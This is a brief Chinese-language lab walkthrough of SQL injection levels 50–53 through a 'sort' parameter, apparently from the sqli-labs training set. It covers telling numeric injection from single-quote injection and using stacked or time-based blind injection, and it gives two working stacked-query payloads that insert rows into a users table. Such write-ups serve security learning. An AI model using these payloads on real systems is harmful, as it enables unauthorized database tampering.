less50
数字型注入,查看源码会发现存在堆叠注入
payload
?sort=2;insert users(id,username,password) value ('50','less50','1')
less51
测试1 1' 1' --+ 正常 异常 正常
可以知道是单引号注入
也是堆叠注入,同上
less52
关闭了报错,可以使用堆叠注入。
less53
输入?sort=rand(),页面无变化,那么说明这关是字符型
用时间盲注
堆叠也可以
payload
?sort=1';insert%20users(id%2cusername%2cpassword)%20values(53%2c'less53'%2c'1')%23
这里我没有用url编码的话是无法注入的。